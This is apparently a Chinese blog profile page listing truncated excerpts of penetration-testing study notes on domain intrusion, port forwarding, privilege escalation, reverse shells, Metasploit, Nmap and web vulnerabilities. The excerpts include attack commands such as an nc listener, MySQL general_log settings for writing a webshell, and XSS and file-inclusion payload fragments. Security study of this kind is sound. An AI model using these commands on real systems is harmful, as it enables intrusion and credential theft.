自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(27)
  • 收藏
  • 关注

原创 内网渗透笔记

内网渗透思路​ 通过域成员主机,定位出域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网。内网基础知识1、工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组。2、域:用来描述一种架构,和“工作组”相对应,由工作组升级而

2022-05-06 20:02:33 2323

原创 lcx端口转发及远程终端问题

lcx端口转发及远程终端问题一、lcx端口转发1、描述lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。2、lcx命令[option:] -listen <ConnectPort> <Transm

2022-04-27 15:09:53 932

原创 Windows提权

Windows提权Windows基础知识一、用户与用户组在Windows中,不同用户有着不同的权限。主要权限包括有:完全控制修改读取和执行列出文件夹内容读取写入1、内置用户Administrator:系统管理员账号,拥有完全控制权Guest:来宾账号,基本权限,默认时禁用2、查看本地用户net user3、查看用户详细信息net user darkid用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i

2022-04-25 21:31:35 4755

原创 中间件漏洞

中间件漏洞概述中间件:中间件是提供系统软件和应用软件之间连接的软件,以便软件各部分之间的沟通。常见的中间件iisapachetomcatnginxjbossweblogicwebsphereIIS漏洞一、PUT上传漏洞1、漏洞描述IIS在web扩展中开启了webdav,配置了可以写入的权限。版本:IIS6.02、漏洞复现在网页目录中使用OPTIONS提交方式,判断是否看可以使用PUT和MOVE方式进行提交请求(1)使用burp任意抓取报文(2)修改请求头为OPTIO

2022-04-23 15:32:35 3854

原创 后台挂起CS服务端

后台挂起CS服务端apt install screen -y:下载screen:命令screen:启动,输入任意键就会进入另一个终端在这个终端启动CS服务端:./teamserverCtrl+a+d退出screen的终端,来到实际终端,键入screen -ls查看后台终端会话断开vps ssh连接,连接CS服务端...

2022-04-18 23:08:29 2553

原创 各种反弹shell原理

各种反弹shell原理一、理解反弹shell1、为什么需要反弹shell当正向连接不可达时候客户机中了木马,但是在局域网内,无法正向连接。由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求2、原理反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端二、常用的反弹shell命令1、bash进行反弹(1)在windows上启动监听端口nc -lvp 4444l:代表入站监听v:代表输出信息级别p:代表监听的端口(2)在Lin

2022-04-18 21:09:10 10285

原创 MSF渗透测试框架

MSF渗透测试框架一、模块模块名解释Auxiliaries辅助模块Exploit漏洞利用模块Payload攻击载荷模块Post后渗透模块Encoders编码工具模块evasion混淆模块Meterpreter后续利用模块模块位置:/usr/share/metasploit-framework/modules二、基本命令msfconsole #启动msfmsfupdate #更新h

2022-04-18 18:56:27 455

原创 Nmap扫描

Nmap扫描一、基础功能#扫描IP地址nmap -sn 192.168.0.1/24 192.168.0.1-255#扫描端口号基于syn扫描:nmap -sS 192.168.0.1基于三次握手扫描:nmap -sT 192.168.0.1#指定端口扫描nmap -p10-20 -p80,443 192.168.0.1#扫描端口和版本nmap -sV 192.168.0.1#扫描操作系统nmap -O 192.168.0.1#万能开关nmap -A 192.168.0

2022-04-18 18:55:57 1024

原创 渗透测试步骤与思路

渗透测试步骤与思路一、信息收集1、主机扫描扫描某个网段内存在的主机扫描主机开放端口和服务扫描主机的操作系统和版本号扫描主机可能存在的已知漏洞2、web扫描查询域名和子域名信息whois查询扫描web应用的url路径扫描web应用后台管理入口常规漏洞扫描3、功能分析分析前台页面的登录注册功能根据用户注册提示确定可用账号尝试进行注册并登录,确认各项功能确定前台页面的URL跳转,用户评论,文件引用,文件上传下载等强交互功能点确定后台是否存在文件上传,查询功能,命令功能

2022-04-18 18:55:25 3913

原创 PHP反序列化漏洞

PHP反序列化通过反序列化导致参数可控一、魔术方法在PHP反序列化的过程中,会自动执行一些魔术方法,完整列表如下:方法名调用条件__call调用不可访问或不存在的方法时被调用__callStatic调用不可访问或不存在的静态方法时被调用__clone进行对象clone时被调用,用来调整对象的克隆行为__construct构建对象时被调用__debuginfo当使用var_dump()打印对象时被调用,PHP5.6__destruct明

2022-04-17 11:53:09 679

原创 Mysql 后台日志写shell(root权限)

Mysql 写shell一、后台日志写shell前提:需要有root权限outfile被禁止文件写入被拦截1、查看配置是否开启写日志日志写入路径show variables like '%general%';2、开启general log模式为onset global general_log = on;3、设置目录为shell地址set global general_log_file = '/var/www/html';4、写入shellselect '<?

2022-04-15 16:26:25 1741

原创 SQL注入漏洞

SQL注入漏洞1、注入攻击的核心点:拼接有效的语句或代码确保完成闭合,并且可以改变原有执行逻辑2、防护:从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。使用mysqli的预处理功能一、查询注入的数据类型注入类型可以分为三类:1、数字型select * from tables where id = 1; 2、字符型select * from tables whe

2022-04-15 16:24:49 1024

原创 XXE外部实体注入漏洞

XXE外部实体注入漏洞一、概念libxml2.9以前默认开启了外部实体引用功能导致的注入二、XML文档结构1、XML语法XML文档必须有一个根元素必须有关闭标签对大小写敏感正确嵌套属性值必须加引号<?xml version="1.0" encoding="UTF-8"?><class> <id>2022</id></class>2、DTD(document type definition)xml文档结

2022-04-15 16:19:54 148

原创 XSS跨站攻击漏洞

XSS跨站攻击漏洞xss的核心要求十构造出能够让前端执行的javascript代码XSS是攻击的是用户一、概述跨站脚本攻击:让攻击者的js攻击代码在用户的浏览器上执行。1、JavaScript运行条件(1)代码位于"<script>alert(1)</script>(2)代码位于onclick事件中,此类事件带有onerror,onload,onfocus,onblur,onchange,onmouseover等<button onclick=

2022-04-15 16:19:21 1092

原创 SSRF服务器请求伪造

SSRF服务器请求伪造一、概述SSRF:服务端请求伪造,其形成的原因是由于服务端提供了从其他服务器应用获取数据,但又没有对目标地址做出严格的过滤与限制。导致攻击者可以传入任意的地址让后端服务器发起请求,并返回对目标地址的数据请求。数据流:攻击者---服务器---目标地址我们可以通过伪造服务器发送请求,从而获取客户端所不能得到的数据二、SSRF常见函数file_get_contents()fsockopen()curl_exec()共同点:通过网络协议,远程访问目标服务器上的资源,然后

2022-04-15 16:18:44 176

原创 文件操作漏洞

文件操作漏洞文件包含漏洞1、本地文件包含源代码$filename = $_GET['filename'];include $filename; //或者include_once require require_onceecho '欢迎来到php世界';利用条件php.ini中的allow_url_fopen=On(默认开启)用户参数可控后台代码没有对包含文件进行过滤利用方式?filename=login.php?filename=/opt/lampp/l

2022-04-15 16:14:54 883

原创 CSRF漏洞

CSRF漏洞一、跨站请求伪造概述1、定义攻击者利用服务器对用户的信任。也被称之为one click攻击攻击者伪造一个用户发送给服务器的正常请求,其核心是用已登录的用户发请求。2、攻击要点服务器没有对操作来源进行判断,如ip referer受害者处于登录状态攻击者需要找到一条可以修改或敏感信息的请求二、使用burp构造钓鱼网站进入CSRF,做修改密码操作,burp抓包在抓包的页面中,右键,生成CSRF POC将生成的HTML网页复制到攻击服务器下,访问此地址诱使用户点击,完

2022-04-15 16:14:16 127

原创 渗透测试基础

WEB渗透基础知识一、基础知识扫盲1、渗透测试类型黑盒测试白盒测试灰盒测试2、安全漏洞生命周期3、漏洞库CVECWEOWASPCNVDCNNVD漏洞盒子补天4、渗透测试流程前期交互—情报搜集—汇总分析—渗透攻击—后渗透—报告二、渗透测试主流工具域名注册信息查询:whois在线查询DNS,IP,nslookup在线漏洞搜索引擎:fofa shadon zoomeyes指纹识别:CMS识别工具,操作系统识别工具端口扫描:Nmap masscan网站路径

2022-04-09 12:20:47 751

原创 docker基本配置

Docker基本配置一、安装过程1、安装必备的工具包yum install net-toolsyum install -y yum-utils device-mapper-persistent-data lvm22、安装docker社区版安装docker-ce:yum install -y docker-ce3、关于docker服务启动停止systemctl start/stop/restart/status docker4、配置docker国内镜像vi /etc/doc

2022-04-04 15:55:17 2331

原创 Linux操作系统进阶

Linux操作系统进阶一、TCPDump流量监控工具基本数据:五元组源ip源端口目的ip目的端口协议1、安装yum install tcpdumplibpcap:linux上标准的流量监控库Windows上比较知名的是wincap和npcap目前市面上主流的各种流量设备,底层都基于以上库2、使用# 监控ens33上的流量,并输出到屏幕上tcpdump -i ens33 # 监控当前服务器80端口的流量tcpdump and dst port 80 -i ens33#

2022-04-02 18:53:59 2613

原创 Linux操作系统

Linux操作系统一、概述1、基本功能进程和线程管理存储管理文件管理设备管理用户接口用户和机器之间的接口2、操作系统层次内核(Kernel)壳(shell)应用程序(APP)二、Linux安装文件系统:xfs格式# 关机shutdown -h now三、远程管理1、使用命令行登录ssh -l root 192.168.0.1ssh [email protected]、上传下载文件命令# 自带# 上传scp D:\1.tx

2022-03-31 17:04:19 1404

原创 Windows操作系统进阶

Windows操作系统进阶一、AD域服务(active directory 活动目录)1、活动目录(AD)面向Windows服务器中的目录服务2、功能服务器及客户端计算机管理用户服务管理资源管理:打印机,文件共享,桌面配置应用系统支撑:财务,OA,办公自动化3、ADWindows一种服务一个目录数据库4、域活动目录一种体现形式有域控制器和成员计算机组成域控制器:一台部署了活动目录服务的服务器域名空间:定位了网络资源位置域中的客户机称之为对象,每一个对象都有对应

2022-03-29 16:22:26 2411

原创 网络协议与攻击模拟

网络协议与攻击模拟一、协议TCP/IP协议簇1、协议网络接口层物理层数据链路层网络层:IP协议(v4/v6) ARP(地址解析) RARP ICMP(控制报文协议) IGMP传输层:TCP(传输控制协议) UDP(用户数据报协议)应用层:基于传输层端口 HTTP HTTPSDHCPDNSHTTPHTTPSFTPSMTPPOP3IMAP二、流量抓取工具(wireshark)1、网卡wireshark是对主机网卡上数据流量抓取2、

2022-03-28 15:36:42 4228 1

原创 路由交换技术

路由交换技术一、以太网和以太网帧交换机工作在数据链路层所封装的是MAC头部(源,目的的MAC地址),差错校验1、以太网以太网==局域网2、以太网的MAC用来标识以太网上的设备MAC地址由48位的二进制组成12位一组16进制表示前面24位为厂商编号,后24位为系列号设备单独设备:第八位为0的时候为单独设备,单播地址一组设备:当第八位为1时为一组设备,组播地址全F:广播地址全0:默认填充地址,不知道对方MAC时,会自动填充一个目的MAC地址3、以太网的帧

2022-03-24 23:31:22 9432

原创 windows与网络基础

windows与网络基础命令1、win+R 打开CMD来到命令提示符2、如果权限不够的时候使用管理员运行一、目录和文件的操作1、帮助使用【命令】 /?查看帮助cd /?2、cd命令 切换目录切换到D盘 cd /d d:\使用/d来切换驱动器cd /d d:如果没有切换驱动器则不需要使用/d目录分为相对路径和绝对路径相对路径(以当前为起点)绝对路径(以驱动器号为起点)使用…/来返回上一级. 代表当前目录3、dir命令 显示文件列表# 显示隐藏

2022-03-23 16:56:49 2548

原创 MSF从shell获取meterpreter

MSF从shell获取meterpreter目的:有时候渗透过程中我们拿到的msf的shell不是meterpreter的时候可以用把它移交到meterpreter中。1、使用ctrl+z 挂起shell2、使用sessions查看会话3、使用模块post/multi/manage/shell_to_meterpretershow optionset session 1run4、获取meterpreter的shell...

2022-03-22 23:05:01 2007

原创 渗透测试之信息收集

一、域名信息# whois查询 1、站长之家:http://whois.chinaz.com/# whois反查 1、站长之家:http://whois.chinaz.com 2、查询域名所有人、域名注册商、注册日期、邮箱、电话等# 备案信息查询 1、常用备案信息查询网站,获取网站的详细信息 2、ICP备案查询网:beian.miit.gov.cn/ 3、天眼查:https://www.tianyancha.com/ 4、爱站网:https://www.aizhan.com/二、

2022-03-22 23:01:32 3379

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除